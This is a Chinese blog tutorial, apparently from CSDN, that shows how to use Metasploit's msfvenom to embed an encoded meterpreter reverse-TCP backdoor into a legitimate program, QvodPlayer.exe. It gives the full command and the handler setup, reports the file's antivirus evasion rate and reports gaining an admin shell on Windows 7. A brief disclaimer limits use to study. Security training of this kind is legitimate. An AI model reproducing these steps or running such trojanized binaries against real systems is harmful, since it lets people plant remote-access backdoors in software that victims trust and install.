MSF给正常程序添加后门

今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF给正常程序添加后门。

免责声明:
本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负!
再次强调:严禁对未授权设备进行渗透测试!

一、后门制作

在上文MSF制作Windows客户端恶意软件获取SHELL过程中,我们进行了使用MSF创造一个后门文件的实战。今天,我们来学习以下如何给一个已经存在程序添加后门程序。
我们今天还是准备使用Kali Linux设备对Windows7设备进行渗透测试,由于在实践中,给一个单独的软件添加后门程序总是会导致程序无法运行,因此我们尝试找到一个符合类型的软件,即该软件由多个exe可执行文件组成,主程序执行后会调用其他程序,我们给非主程序的程序添加后门。
在Kali Linux上,执行命令:

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.136.199 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 10 -x /root/QvodPlayer.exe -f exe -o /var/www/html/exp.exe  

即可给QvodPlayer.exe可执行文件添加后门程序,该命令执行结果如下所示:
在这里插入图片描述
在以上的命令中,大部分参数都已经在MSF制作Windows客户端恶意软件获取SHELL过程讲过,这里就不过多赘述了。唯一需要提到的是-x参数,该参数指定了要给哪个可执行文件添加后门程序。

二、监听开启

在完成后门程序的添加后,我们还需要在Kali Linux系统上进行监听。执行命令:

use exploit/multi/handler

使用该模块,并设置LHOST参数,使之如下所示:
在这里插入图片描述
之后,我们执行该模块,即可开启监听了。

三、效果检验

最后,我们对刚才生成的后门程序进行检测。

(一)软件查杀测评

首先,我们还是访问https://www.virscan.org/,对含有我们后门程序的软件进行测评,结果如下所示:
在这里插入图片描述
在这里插入图片描述
从上图中可以看出,我们的后门程序免杀率为69%。

(二)软件效果检验

我们在Windows7系统上运行该程序,在kali Linux系统上就可以看到Windows 7系统反馈的SHELL,如下所示:
在这里插入图片描述
从上图可以看出,我们成功获取到Windows7系统的管理员权限。
原创不易,转载请说明出处:https://blog.csdn.net/weixin_40228200

  • 4
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

永远是少年啊

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值